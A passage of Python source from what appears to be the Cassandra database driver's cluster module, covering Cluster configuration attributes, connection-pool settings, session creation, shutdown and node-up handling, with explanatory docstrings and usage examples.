OperationTimedOut, UnsupportedOperation,
SchemaTargetType, DriverException)
from cassandra.connection import (ConnectionException, ConnectionShutdown,
ConnectionHeartbeat, ProtocolVersionUnsupported)
from cassandra.cqltypes import UserType
from cassandra.encoder import Encoder
from cassandra.protocol import (QueryMessage, ResultMessage,
ErrorMessage, ReadTimeoutErrorMessage,
WriteTimeoutErrorMessage,
UnavailableErrorMessage,
OverloadedErrorMessage,
PrepareMessage, ExecuteMessage,
PreparedQueryNotFound,
IsBootstrappingErrorMessage,
BatchMessage, RESULT_KIND_PREPARED,
RESULT_KIND_SET_KEYSPACE, RESULT_KIND_ROWS,
RESULT_KIND_SCHEMA_CHANGE, MIN_SUPPORTED_VERSION,
ProtocolHandler)
from cassandra.metadata import Metadata, protect_name, murmur3
from cassandra.policies import (TokenAwarePolicy, DCAwareRoundRobinPolicy, SimpleConvictionPolicy,
ExponentialReconnectionPolicy, HostDistance,
RetryPolicy, IdentityTranslator)
from cassandra.pool import (Host, _ReconnectionHandler, _HostReconnectionHandler,
HostConnectionPool, HostConnection,
NoConnectionsAvailable)
from cassandra.query import (SimpleStatement, PreparedStatement, BoundStatement,
BatchStatement, bind_params, QueryTrace,
named_tuple_factory, dict_factory, tuple_factory, FETCH_SIZE_UNSET)
def _is_eventlet_monkey_patched():
if 'eventlet.patcher' not in sys.modules:
return False
import eventlet.patcher
return eventlet.patcher.is_monkey_patched('socket')
def _is_gevent_monkey_patched():
if 'gevent.monkey' not in sys.modules:
return False
import gevent.socket
return socket.socket is gevent.socket.socket
# default to gevent when we are monkey patched with gevent, eventlet when
# monkey patched with eventlet, otherwise if libev is available, use that as
# the default because it's fastest. Otherwise, use asyncore.
if _is_gevent_monkey_patched():
from cassandra.io.geventreactor import GeventConnection as DefaultConnection
elif _is_eventlet_monkey_patched():
from cassandra.io.eventletreactor import EventletConnection as DefaultConnection
else:
try:
from cassandra.io.libevreactor import LibevConnection as DefaultConnection # NOQA
except ImportError:
from cassandra.io.asyncorereactor import AsyncoreConnection as DefaultConnection # NOQA
# Forces load of utf8 encoding module to avoid deadlock that occurs
# if code that is being imported tries to import the module in a separate
# thread.
# See http://bugs.python.org/issue10923
"".encode('utf8')
log = logging.getLogger(__name__)
DEFAULT_MIN_REQUESTS = 5
DEFAULT_MAX_REQUESTS = 100
DEFAULT_MIN_CONNECTIONS_PER_LOCAL_HOST = 2
DEFAULT_MAX_CONNECTIONS_PER_LOCAL_HOST = 8
DEFAULT_MIN_CONNECTIONS_PER_REMOTE_HOST = 1
DEFAULT_MAX_CONNECTIONS_PER_REMOTE_HOST = 2
_NOT_SET = object()
class NoHostAvailable(Exception):
"""
Raised when an operation is attempted but all connections are
busy, defunct, closed, or resulted in errors when used.
"""
errors = None
"""
A map of the form ``{ip: exception}`` which details the particular
Exception that was caught for each host the operation was attempted
against.
"""
def __init__(self, message, errors):
Exception.__init__(self, message, errors)
self.errors = errors
def _future_completed(future):
""" Helper for run_in_executor() """
exc = future.exception()
if exc:
log.debug("Failed to run task on executor", exc_info=exc)
def run_in_executor(f):
"""
A decorator to run the given method in the ThreadPoolExecutor.
"""
@wraps(f)
def new_f(self, *args, **kwargs):
if self.is_shutdown:
return
try:
future = self.executor.submit(f, self, *args, **kwargs)
future.add_done_callback(_future_completed)
except Exception:
log.exception("Failed to submit task to executor")
return new_f
_clusters_for_shutdown = set()
def _register_cluster_shutdown(cluster):
_clusters_for_shutdown.add(cluster)
def _discard_cluster_shutdown(cluster):
_clusters_for_shutdown.discard(cluster)
def _shutdown_clusters():
clusters = _clusters_for_shutdown.copy() # copy because shutdown modifies the global set "discard"
for cluster in clusters:
cluster.shutdown()
atexit.register(_shutdown_clusters)
# murmur3 implementation required for TokenAware is only available for CPython
import platform
if platform.python_implementation() == 'CPython':
def default_lbp_factory():
if murmur3 is not None:
return TokenAwarePolicy(DCAwareRoundRobinPolicy())
return DCAwareRoundRobinPolicy()
else:
def default_lbp_factory():
return DCAwareRoundRobinPolicy()
class Cluster(object):
"""
The main class to use when interacting with a Cassandra cluster.
Typically, one instance of this class will be created for each
separate Cassandra cluster that your application interacts with.
Example usage::
>>> from cassandra.cluster import Cluster
>>> cluster = Cluster(['192.168.1.1', '192.168.1.2'])
>>> session = cluster.connect()
>>> session.execute("CREATE KEYSPACE ...")
>>> ...
>>> cluster.shutdown()
``Cluster`` and ``Session`` also provide context management functions
which implicitly handle shutdown when leaving scope.
"""
contact_points = ['127.0.0.1']
"""
The list of contact points to try connecting for cluster discovery.
Defaults to loopback interface.
Note: When using :class:`.DCAwareLoadBalancingPolicy` with no explicit
local_dc set (as is the default), the DC is chosen from an arbitrary
host in contact_points. In this case, contact_points should contain
only nodes from a single, local DC.
"""
port = 9042
"""
The server-side port to open connections to. Defaults to 9042.
"""
cql_version = None
"""
If a specific version of CQL should be used, this may be set to that
string version. Otherwise, the highest CQL version supported by the
server will be automatically used.
"""
protocol_version = 4
"""
The maximum version of the native protocol to use.
The driver will automatically downgrade version based on a negotiation with
the server, but it is most efficient to set this to the maximum supported
by your version of Cassandra. Setting this will also prevent conflicting
versions negotiated if your cluster is upgraded.
Version 2 of the native protocol adds support for lightweight transactions,
batch operations, and automatic query paging. The v2 protocol is
supported by Cassandra 2.0+.
Version 3 of the native protocol adds support for protocol-level
client-side timestamps (see :attr:`.Session.use_client_timestamp`),
serial consistency levels for :class:`~.BatchStatement`, and an
improved connection pool.
Version 4 of the native protocol adds a number of new types, server warnings,
new failure messages, and custom payloads. Details in the
`project docs <https://github.com/apache/cassandra/blob/trunk/doc/native_protocol_v4.spec>`_
The following table describes the native protocol versions that
are supported by each version of Cassandra:
+-------------------+-------------------+
| Cassandra Version | Protocol Versions |
+===================+===================+
| 1.2 | 1 |
+-------------------+-------------------+
| 2.0 | 1, 2 |
+-------------------+-------------------+
| 2.1 | 1, 2, 3 |
+-------------------+-------------------+
| 2.2 | 1, 2, 3, 4 |
+-------------------+-------------------+
"""
compression = True
"""
Controls compression for communications between the driver and Cassandra.
If left as the default of :const:`True`, either lz4 or snappy compression
may be used, depending on what is supported by both the driver
and Cassandra. If both are fully supported, lz4 will be preferred.
You may also set this to 'snappy' or 'lz4' to request that specific
compression type.
Setting this to :const:`False` disables compression.
"""
_auth_provider = None
_auth_provider_callable = None
@property
def auth_provider(self):
"""
When :attr:`~.Cluster.protocol_version` is 2 or higher, this should
be an instance of a subclass of :class:`~cassandra.auth.AuthProvider`,
such as :class:`~.PlainTextAuthProvider`.
When :attr:`~.Cluster.protocol_version` is 1, this should be
a function that accepts one argument, the IP address of a node,
and returns a dict of credentials for that node.
When not using authentication, this should be left as :const:`None`.
"""
return self._auth_provider
@auth_provider.setter # noqa
def auth_provider(self, value):
if not value:
self._auth_provider = value
return
try:
self._auth_provider_callable = value.new_authenticator
except AttributeError:
if self.protocol_version > 1:
raise TypeError("auth_provider must implement the cassandra.auth.AuthProvider "
"interface when protocol_version >= 2")
elif not callable(value):
raise TypeError("auth_provider must be callable when protocol_version == 1")
self._auth_provider_callable = value
self._auth_provider = value
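    # Illustrative example (PlainTextAuthProvider ships with this driver):
    #   from cassandra.auth import PlainTextAuthProvider
    #   auth = PlainTextAuthProvider(username='user', password='pass')
    #   cluster = Cluster(['10.0.0.1'], auth_provider=auth)
    # With protocol_version 1, pass a callable taking a host address and
    # returning a credentials dict instead.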
load_balancing_policy = None
"""
An instance of :class:`.policies.LoadBalancingPolicy` or
one of its subclasses.
.. versionchanged:: 2.6.0
Defaults to :class:`~.TokenAwarePolicy` (:class:`~.DCAwareRoundRobinPolicy`)
when using CPython (where the murmur3 extension is available), and to
:class:`~.DCAwareRoundRobinPolicy` otherwise. The default local DC will be chosen from the contact points.
**Please see** :class:`~.DCAwareRoundRobinPolicy` **for a discussion on default behavior with respect to
DC locality and remote nodes.**
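For example, a sketch pinning the local DC explicitly (hypothetical DC name)::
    from cassandra.policies import TokenAwarePolicy, DCAwareRoundRobinPolicy
    policy = TokenAwarePolicy(DCAwareRoundRobinPolicy(local_dc='DC1'))
    cluster = Cluster(load_balancing_policy=policy)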
"""
reconnection_policy = ExponentialReconnectionPolicy(1.0, 600.0)
"""
An instance of :class:`.policies.ReconnectionPolicy`. Defaults to an instance
of :class:`.ExponentialReconnectionPolicy` with a base delay of one second and
a max delay of ten minutes.
"""
default_retry_policy = RetryPolicy()
"""
A default :class:`.policies.RetryPolicy` instance to use for all
:class:`.Statement` objects which do not have a :attr:`~.Statement.retry_policy`
explicitly set.
"""
conviction_policy_factory = SimpleConvictionPolicy
"""
A factory function which creates instances of
:class:`.policies.ConvictionPolicy`. Defaults to
:class:`.policies.SimpleConvictionPolicy`.
"""
address_translator = IdentityTranslator()
"""
:class:`.policies.AddressTranslator` instance to be used in translating server node addresses
to driver connection addresses.
"""
connect_to_remote_hosts = True
"""
If left as :const:`True`, hosts that are considered :attr:`~.HostDistance.REMOTE`
by the :attr:`~.Cluster.load_balancing_policy` will have a connection
opened to them. Otherwise, they will not have a connection opened to them.
Note that the default load balancing policy ignores remote hosts by default.
.. versionadded:: 2.1.0
"""
metrics_enabled = False
"""
Whether or not metric collection is enabled. If enabled, :attr:`.metrics`
will be an instance of :class:`~cassandra.metrics.Metrics`.
"""
metrics = None
"""
An instance of :class:`cassandra.metrics.Metrics` if :attr:`.metrics_enabled` is
:const:`True`, else :const:`None`.
"""
ssl_options = None
"""
An optional dict which will be used as kwargs for ``ssl.wrap_socket()``
when new sockets are created. This should be used when client encryption
is enabled in Cassandra.
By default, a ``ca_certs`` value should be supplied (the value should be
a string pointing to the location of the CA certs file), and you probably
want to specify ``ssl_version`` as ``ssl.PROTOCOL_TLSv1`` to match
Cassandra's default protocol.
.. versionchanged:: 3.3.0
In addition to ``wrap_socket`` kwargs, clients may also specify ``'check_hostname': True`` to verify the cert hostname
as outlined in RFC 2818 and RFC 6125. Note that this requires the certificate to be transferred, so
should almost always require the option ``'cert_reqs': ssl.CERT_REQUIRED``. Note also that this functionality was not built into
the Python standard library until versions 2.7.9 and 3.2. To enable this mechanism in earlier versions, patch ``ssl.match_hostname``
with a custom or `back-ported function <https://pypi.python.org/pypi/backports.ssl_match_hostname>`_.
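For example, a minimal sketch (hypothetical certificate path)::
    import ssl
    ssl_opts = {'ca_certs': '/path/to/ca.pem',
                'ssl_version': ssl.PROTOCOL_TLSv1,
                'cert_reqs': ssl.CERT_REQUIRED}
    cluster = Cluster(ssl_options=ssl_opts)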
"""
sockopts = None
"""
An optional list of tuples which will be used as arguments to
``socket.setsockopt()`` for all created sockets.
Note: some drivers find setting TCP_NODELAY beneficial in the context of
their execution model. It was not found generally beneficial for this driver.
To try with your own workload, set ``sockopts = [(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]``
"""
max_schema_agreement_wait = 10
"""
The maximum duration (in seconds) that the driver will wait for schema
agreement across the cluster. Defaults to ten seconds.
If set <= 0, the driver will bypass schema agreement waits altogether.
"""
metadata = None
"""
An instance of :class:`cassandra.metadata.Metadata`.
"""
connection_class = DefaultConnection
"""
This determines what event loop system will be used for managing
I/O with Cassandra. These are the current options:
* :class:`cassandra.io.asyncorereactor.AsyncoreConnection`
* :class:`cassandra.io.libevreactor.LibevConnection`
* :class:`cassandra.io.eventletreactor.EventletConnection` (requires monkey-patching - see doc for details)
* :class:`cassandra.io.geventreactor.GeventConnection` (requires monkey-patching - see doc for details)
* :class:`cassandra.io.twistedreactor.TwistedConnection`
By default, ``AsyncoreConnection`` will be used, which uses
the ``asyncore`` module in the Python standard library.
If ``libev`` is installed, ``LibevConnection`` will be used instead.
If ``gevent`` or ``eventlet`` monkey-patching is detected, the corresponding
connection class will be used automatically.
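For example, a sketch explicitly selecting the libev event loop (requires the
optional libev extension to be built)::
    from cassandra.io.libevreactor import LibevConnection
    cluster = Cluster(connection_class=LibevConnection)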
"""
control_connection_timeout = 2.0
"""
A timeout, in seconds, for queries made by the control connection, such
as querying the current schema and information about nodes in the cluster.
If set to :const:`None`, there will be no timeout for these queries.
"""
idle_heartbeat_interval = 30
"""
Interval, in seconds, on which to heartbeat idle connections. This helps
keep connections open through network devices that expire idle connections.
It also helps discover bad connections early in low-traffic scenarios.
Setting to zero disables heartbeats.
"""
schema_event_refresh_window = 2
"""
Window, in seconds, within which a schema component will be refreshed after
receiving a schema_change event.
The driver delays a random amount of time in the range [0.0, window)
before executing the refresh. This serves two purposes:
1.) Spread the refresh for deployments with large fanout from C* to client tier,
preventing a 'thundering herd' problem with many clients refreshing simultaneously.
2.) Remove redundant refreshes. Redundant events arriving within the delay period
are discarded, and only one refresh is executed.
Setting this to zero will execute refreshes immediately.
Setting this negative will disable schema refreshes in response to push events
(refreshes will still occur in response to schema change responses to DDL statements
executed by Sessions of this Cluster).
"""
topology_event_refresh_window = 10
"""
Window, in seconds, within which the node and token list will be refreshed after
receiving a topology_change event.
Setting this to zero will execute refreshes immediately.
Setting this negative will disable node refreshes in response to push events.
See :attr:`.schema_event_refresh_window` for a discussion of the rationale.
"""
status_event_refresh_window = 2
"""
Window, in seconds, within which the driver will start the reconnect after
receiving a status_change event.
Setting this to zero will connect immediately.
This is primarily used to avoid 'thundering herd' in deployments with large fanout from cluster to clients.
When nodes come up, clients attempt to reprepare prepared statements (depending on :attr:`.reprepare_on_up`), and
establish connection pools. This can cause a rush of connections and queries if not mitigated with this factor.
"""
prepare_on_all_hosts = True
"""
Specifies whether statements should be prepared on all hosts, or just one.
This can reasonably be disabled on long-running applications with numerous clients preparing statements on startup,
where a randomized initial condition of the load balancing policy can be expected to distribute prepares from
different clients across the cluster.
"""
reprepare_on_up = True
"""
Specifies whether all known prepared statements should be prepared on a node when it comes up.
May be used to avoid overwhelming a node on return, or if it is believed that the node was only marked down due to
a network issue. If statements are not reprepared, they are prepared on the first execution, causing
an extra roundtrip for one or more client requests.
"""
connect_timeout = 5
"""
Timeout, in seconds, for creating new connections.
This timeout covers the entire connection negotiation, including TCP
establishment, options passing, and authentication.
"""
@property
def schema_metadata_enabled(self):
"""
Flag indicating whether internal schema metadata is updated.
When disabled, the driver does not populate Cluster.metadata.keyspaces on connect, or on schema change events. This
can be used to speed initial connection, and reduce load on client and server during operation. Turning this off
gives away token aware request routing, and programmatic inspection of the metadata model.
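For example, a sketch disabling both schema and token metadata at construction,
trading metadata features for faster connection::
    cluster = Cluster(schema_metadata_enabled=False, token_metadata_enabled=False)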
"""
return self.control_connection._schema_meta_enabled
@schema_metadata_enabled.setter
def schema_metadata_enabled(self, enabled):
self.control_connection._schema_meta_enabled = bool(enabled)
@property
def token_metadata_enabled(self):
"""
Flag indicating whether internal token metadata is updated.
When disabled, the driver does not query node token information on connect, or on topology change events. This
can be used to speed initial connection, and reduce load on client and server during operation. It is most useful
in large clusters using vnodes, where the token map can be expensive to compute. Turning this off
gives away token aware request routing, and programmatic inspection of the token ring.
"""
return self.control_connection._token_meta_enabled
@token_metadata_enabled.setter
def token_metadata_enabled(self, enabled):
self.control_connection._token_meta_enabled = bool(enabled)
sessions = None
control_connection = None
scheduler = None
executor = None
is_shutdown = False
_is_setup = False
_prepared_statements = None
_prepared_statement_lock = None
_idle_heartbeat = None
_user_types = None
"""
A map of {keyspace: {type_name: UserType}}
"""
_listeners = None
_listener_lock = None
def __init__(self,
contact_points=["127.0.0.1"],
port=9042,
compression=True,
auth_provider=None,
load_balancing_policy=None,
reconnection_policy=None,
default_retry_policy=None,
conviction_policy_factory=None,
metrics_enabled=False,
connection_class=None,
ssl_options=None,
sockopts=None,
cql_version=None,
protocol_version=4,
executor_threads=2,
max_schema_agreement_wait=10,
control_connection_timeout=2.0,
idle_heartbeat_interval=30,
schema_event_refresh_window=2,
topology_event_refresh_window=10,
connect_timeout=5,
schema_metadata_enabled=True,
token_metadata_enabled=True,
address_translator=None,
status_event_refresh_window=2,
prepare_on_all_hosts=True,
reprepare_on_up=True):
"""
``executor_threads`` defines the number of threads in a pool for handling asynchronous tasks such as
establishing connection pools or refreshing metadata.
Any of the mutable Cluster attributes may be set as keyword arguments to the constructor.
"""
if contact_points is not None:
if isinstance(contact_points, six.string_types):
raise TypeError("contact_points should not be a string, it should be a sequence (e.g. list) of strings")
if None in contact_points:
raise ValueError("contact_points should not contain None (it can resolve to localhost)")
self.contact_points = contact_points
self.port = port
self.contact_points_resolved = [endpoint[4][0] for a in self.contact_points
for endpoint in socket.getaddrinfo(a, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)]
self.compression = compression
self.protocol_version = protocol_version
self.auth_provider = auth_provider
if load_balancing_policy is not None:
if isinstance(load_balancing_policy, type):
raise TypeError("load_balancing_policy should not be a class, it should be an instance of that class")
self.load_balancing_policy = load_balancing_policy
else:
self.load_balancing_policy = default_lbp_factory()
if reconnection_policy is not None:
if isinstance(reconnection_policy, type):
raise TypeError("reconnection_policy should not be a class, it should be an instance of that class")
self.reconnection_policy = reconnection_policy
if default_retry_policy is not None:
if isinstance(default_retry_policy, type):
raise TypeError("default_retry_policy should not be a class, it should be an instance of that class")
self.default_retry_policy = default_retry_policy
if conviction_policy_factory is not None:
if not callable(conviction_policy_factory):
raise ValueError("conviction_policy_factory must be callable")
self.conviction_policy_factory = conviction_policy_factory
if address_translator is not None:
if isinstance(address_translator, type):
raise TypeError("address_translator should not be a class, it should be an instance of that class")
self.address_translator = address_translator
if connection_class is not None:
self.connection_class = connection_class
self.metrics_enabled = metrics_enabled
self.ssl_options = ssl_options
self.sockopts = sockopts
self.cql_version = cql_version
self.max_schema_agreement_wait = max_schema_agreement_wait
self.control_connection_timeout = control_connection_timeout
self.idle_heartbeat_interval = idle_heartbeat_interval
self.schema_event_refresh_window = schema_event_refresh_window
self.topology_event_refresh_window = topology_event_refresh_window
self.status_event_refresh_window = status_event_refresh_window
self.connect_timeout = connect_timeout
self.prepare_on_all_hosts = prepare_on_all_hosts
self.reprepare_on_up = reprepare_on_up
self._listeners = set()
self._listener_lock = Lock()
# let Session objects be GC'ed (and shutdown) when the user no longer
# holds a reference.
self.sessions = WeakSet()
self.metadata = Metadata()
self.control_connection = None
self._prepared_statements = WeakValueDictionary()
self._prepared_statement_lock = Lock()
self._user_types = defaultdict(dict)
self._min_requests_per_connection = {
HostDistance.LOCAL: DEFAULT_MIN_REQUESTS,
HostDistance.REMOTE: DEFAULT_MIN_REQUESTS
}
self._max_requests_per_connection = {
HostDistance.LOCAL: DEFAULT_MAX_REQUESTS,
HostDistance.REMOTE: DEFAULT_MAX_REQUESTS
}
self._core_connections_per_host = {
HostDistance.LOCAL: DEFAULT_MIN_CONNECTIONS_PER_LOCAL_HOST,
HostDistance.REMOTE: DEFAULT_MIN_CONNECTIONS_PER_REMOTE_HOST
}
self._max_connections_per_host = {
HostDistance.LOCAL: DEFAULT_MAX_CONNECTIONS_PER_LOCAL_HOST,
HostDistance.REMOTE: DEFAULT_MAX_CONNECTIONS_PER_REMOTE_HOST
}
self.executor = ThreadPoolExecutor(max_workers=executor_threads)
self.scheduler = _Scheduler(self.executor)
self._lock = RLock()
if self.metrics_enabled:
from cassandra.metrics import Metrics
self.metrics = Metrics(weakref.proxy(self))
self.control_connection = ControlConnection(
self, self.control_connection_timeout,
self.schema_event_refresh_window, self.topology_event_refresh_window,
self.status_event_refresh_window,
schema_metadata_enabled, token_metadata_enabled)
def register_user_type(self, keyspace, user_type, klass):
"""
Registers a class to use to represent a particular user-defined type.
Query parameters for this user-defined type will be assumed to be
instances of `klass`. Result sets for this user-defined type will
be instances of `klass`. If no class is registered for a user-defined
type, a namedtuple will be used for result sets, and non-prepared
statements may not encode parameters for this type correctly.
`keyspace` is the name of the keyspace that the UDT is defined in.
`user_type` is the string name of the UDT to register the mapping
for.
`klass` should be a class with attributes whose names match the
fields of the user-defined type. The constructor must accept kwargs
for each of the fields in the UDT.
This method should only be called after the type has been created
within Cassandra.
Example::
cluster = Cluster(protocol_version=3)
session = cluster.connect()
session.set_keyspace('mykeyspace')
session.execute("CREATE TYPE address (street text, zipcode int)")
session.execute("CREATE TABLE users (id int PRIMARY KEY, location address)")
# create a class to map to the "address" UDT
class Address(object):
def __init__(self, street, zipcode):
self.street = street
self.zipcode = zipcode
cluster.register_user_type('mykeyspace', 'address', Address)
# insert a row using an instance of Address
session.execute("INSERT INTO users (id, location) VALUES (%s, %s)",
(0, Address("123 Main St.", 78723)))
# results will include Address instances
results = session.execute("SELECT * FROM users")
row = results[0]
print row.id, row.location.street, row.location.zipcode
"""
if self.protocol_version < 3:
log.warning("User Type serialization is only supported in native protocol version 3+ (%d in use). "
"CQL encoding for simple statements will still work, but named tuples will "
"be returned when reading type %s.%s.", self.protocol_version, keyspace, user_type)
self._user_types[keyspace][user_type] = klass
for session in self.sessions:
session.user_type_registered(keyspace, user_type, klass)
UserType.evict_udt_class(keyspace, user_type)
def get_min_requests_per_connection(self, host_distance):
return self._min_requests_per_connection[host_distance]
def set_min_requests_per_connection(self, host_distance, min_requests):
"""
Sets a threshold for concurrent requests per connection, below which
connections will be considered for disposal (down to core connections;
see :meth:`~Cluster.set_core_connections_per_host`).
Pertains to connection pool management in protocol versions {1,2}.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_min_requests_per_connection() only has an effect "
"when using protocol_version 1 or 2.")
if min_requests < 0 or min_requests > 126 or \
min_requests >= self._max_requests_per_connection[host_distance]:
raise ValueError("min_requests must be 0-126 and less than the max_requests for this host_distance (%d)" %
(self._max_requests_per_connection[host_distance],))
self._min_requests_per_connection[host_distance] = min_requests
def get_max_requests_per_connection(self, host_distance):
return self._max_requests_per_connection[host_distance]
def set_max_requests_per_connection(self, host_distance, max_requests):
"""
Sets a threshold for concurrent requests per connection, above which new
connections will be created to a host (up to max connections;
see :meth:`~Cluster.set_max_connections_per_host`).
Pertains to connection pool management in protocol versions {1,2}.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_max_requests_per_connection() only has an effect "
"when using protocol_version 1 or 2.")
if max_requests < 1 or max_requests > 127 or \
max_requests <= self._min_requests_per_connection[host_distance]:
raise ValueError("max_requests must be 1-127 and greater than the min_requests for this host_distance (%d)" %
(self._min_requests_per_connection[host_distance],))
self._max_requests_per_connection[host_distance] = max_requests
def get_core_connections_per_host(self, host_distance):
"""
Gets the minimum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 2 for :attr:`~HostDistance.LOCAL` and 1 for
:attr:`~HostDistance.REMOTE`.
This property is ignored if :attr:`~.Cluster.protocol_version` is
3 or higher.
"""
return self._core_connections_per_host[host_distance]
def set_core_connections_per_host(self, host_distance, core_connections):
"""
Sets the minimum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 2 for :attr:`~HostDistance.LOCAL` and 1 for
:attr:`~HostDistance.REMOTE`.
Protocol version 1 and 2 are limited in the number of concurrent
requests they can send per connection. The driver implements connection
pooling to support higher levels of concurrency.
If :attr:`~.Cluster.protocol_version` is set to 3 or higher, this
is not supported (there is always one connection per host, unless
the host is remote and :attr:`connect_to_remote_hosts` is :const:`False`)
and using this will result in an :exc:`~.UnsupportedOperation`.
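A minimal sketch (only meaningful when protocol_version is 1 or 2)::
    from cassandra.policies import HostDistance
    cluster = Cluster(protocol_version=2)
    cluster.set_core_connections_per_host(HostDistance.LOCAL, 3)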
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_core_connections_per_host() only has an effect "
"when using protocol_version 1 or 2.")
old = self._core_connections_per_host[host_distance]
self._core_connections_per_host[host_distance] = core_connections
if old < core_connections:
self._ensure_core_connections()
def get_max_connections_per_host(self, host_distance):
"""
Gets the maximum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 8 for :attr:`~HostDistance.LOCAL` and 2 for
:attr:`~HostDistance.REMOTE`.
This property is ignored if :attr:`~.Cluster.protocol_version` is
3 or higher.
"""
return self._max_connections_per_host[host_distance]
def set_max_connections_per_host(self, host_distance, max_connections):
"""
Sets the maximum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 8 for :attr:`~HostDistance.LOCAL` and 2 for
:attr:`~HostDistance.REMOTE`.
If :attr:`~.Cluster.protocol_version` is set to 3 or higher, this
is not supported (there is always one connection per host, unless
the host is remote and :attr:`connect_to_remote_hosts` is :const:`False`)
and using this will result in an :exc:`~.UnsupportedOperation`.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_max_connections_per_host() only has an effect "
"when using protocol_version 1 or 2.")
self._max_connections_per_host[host_distance] = max_connections
def connection_factory(self, address, *args, **kwargs):
"""
Called to create a new connection with proper configuration.
Intended for internal use only.
"""
kwargs = self._make_connection_kwargs(address, kwargs)
return self.connection_class.factory(address, self.connect_timeout, *args, **kwargs)
def _make_connection_factory(self, host, *args, **kwargs):
kwargs = self._make_connection_kwargs(host.address, kwargs)
return partial(self.connection_class.factory, host.address, self.connect_timeout, *args, **kwargs)
def _make_connection_kwargs(self, address, kwargs_dict):
if self._auth_provider_callable:
kwargs_dict.setdefault('authenticator', self._auth_provider_callable(address))
kwargs_dict.setdefault('port', self.port)
kwargs_dict.setdefault('compression', self.compression)
kwargs_dict.setdefault('sockopts', self.sockopts)
kwargs_dict.setdefault('ssl_options', self.ssl_options)
kwargs_dict.setdefault('cql_version', self.cql_version)
kwargs_dict.setdefault('protocol_version', self.protocol_version)
kwargs_dict.setdefault('user_type_map', self._user_types)
return kwargs_dict
def protocol_downgrade(self, host_addr, previous_version):
new_version = previous_version - 1
if new_version < self.protocol_version:
if new_version >= MIN_SUPPORTED_VERSION:
log.warning("Downgrading core protocol version from %d to %d for %s. "
"To avoid this, it is best practice to explicitly set Cluster(protocol_version) to the version supported by your cluster. "
"http://datastax.github.io/python-driver/api/cassandra/cluster.html#cassandra.cluster.Cluster.protocol_version", self.protocol_version, new_version, host_addr)
self.protocol_version = new_version
else:
raise DriverException("Cannot downgrade protocol version (%d) below minimum supported version: %d" % (new_version, MIN_SUPPORTED_VERSION))
def connect(self, keyspace=None):
"""
Creates and returns a new :class:`~.Session` object. If `keyspace`
is specified, that keyspace will be the default keyspace for
operations on the ``Session``.
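Example (hypothetical keyspace name)::
    cluster = Cluster(['127.0.0.1'])
    session = cluster.connect('mykeyspace')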
"""
with self._lock:
if self.is_shutdown:
raise DriverException("Cluster is already shut down")
if not self._is_setup:
log.debug("Connecting to cluster, contact points: %s; protocol version: %s",
self.contact_points, self.protocol_version)
self.connection_class.initialize_reactor()
_register_cluster_shutdown(self)
for address in self.contact_points_resolved:
host, new = self.add_host(address, signal=False)
if new:
host.set_up()
for listener in self.listeners:
listener.on_add(host)
self.load_balancing_policy.populate(
weakref.proxy(self), self.metadata.all_hosts())
try:
self.control_connection.connect()
log.debug("Control connection created")
except Exception:
log.exception("Control connection failed to connect, "
"shutting down Cluster:")
self.shutdown()
raise
self.load_balancing_policy.check_supported()
if self.idle_heartbeat_interval:
self._idle_heartbeat = ConnectionHeartbeat(self.idle_heartbeat_interval, self.get_connection_holders)
self._is_setup = True
session = self._new_session()
if keyspace:
session.set_keyspace(keyspace)
return session
def get_connection_holders(self):
holders = []
for s in self.sessions:
holders.extend(s.get_pools())
holders.append(self.control_connection)
return holders
def shutdown(self):
"""
Closes all sessions and connections associated with this Cluster.
To ensure all connections are properly closed, **you should always
call shutdown() on a Cluster instance when you are done with it**.
Once shutdown, a Cluster should not be used for any purpose.
"""
with self._lock:
if self.is_shutdown:
return
else:
self.is_shutdown = True
if self._idle_heartbeat:
self._idle_heartbeat.stop()
self.scheduler.shutdown()
self.control_connection.shutdown()
for session in self.sessions:
session.shutdown()
self.executor.shutdown()
_discard_cluster_shutdown(self)
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
def _new_session(self):
session = Session(self, self.metadata.all_hosts())
self._session_register_user_types(session)
self.sessions.add(session)
return session
def _session_register_user_types(self, session):
for keyspace, type_map in six.iteritems(self._user_types):
for udt_name, klass in six.iteritems(type_map):
session.user_type_registered(keyspace, udt_name, klass)
def _cleanup_failed_on_up_handling(self, host):
self.load_balancing_policy.on_down(host)
self.control_connection.on_down(host)
for session in self.sessions:
session.remove_pool(host)
self._start_reconnector(host, is_host_addition=False)
def _on_up_future_completed(self, host, futures, results, lock, finished_future):
with lock:
futures.discard(finished_future)
try:
results.append(finished_future.result())
except Exception as exc:
results.append(exc)
if futures:
return
try:
# all futures have completed at this point
for exc in [f for f in results if isinstance(f, Exception)]:
log.error("Unexpected failure while marking node %s up:", host, exc_info=exc)
self._cleanup_failed_on_up_handling(host)
return
if not all(results):
log.debug("Connection pool could not be created, not marking node %s up", host)
self._cleanup_failed_on_up_handling(host)
return
log.info("Connection pools established for node %s", host)
# mark the host as up and notify all listeners
host.set_up()
for listener in self.listeners:
listener.on_up(host)
finally:
with host.lock:
host._currently_handling_node_up = False
# see if there are any pools to add or remove now that the host is marked up
for session in self.sessions:
session.update_created_pools()
def on_up(self, host):
"""
Intended for internal use only.
"""
if self.is_shutdown:
return
log.debug("Waiting to acquire lock for handling up status of node %s", host)
with host.lock:
if host._currently_handling_node_up:
log.debug("Another thread is already handling up status of node %s", host)
return
if host.is_up:
log.debug("Host %s was already marked up", host)
return
host._currently_handling_node_up = True
log.debug("Starting to handle up status of node %s", host)
have_future = False
futures = set()
try:
log.info("Host %s may be up; will prepare queries and open connection pool", host)
reconnector = host.get_and_set_reconnection_handler(None)
if reconnector:
log.debug("Now that host %s is up, cancelling the reconnection handler", host)
reconnector.cancel()
self._prepare_all_queries(host)
log.debug("Done preparing all queries for host %s, ", host)
for session in self.sessions:
session.remove_pool(host)
log.debug("Signalling to load balancing policy that host %s is up", host)
self.load_balancing_policy.on_up(host)
log.debug("Signalling to control connection that host %s is up", host)
self.control_connection.on_up(host)
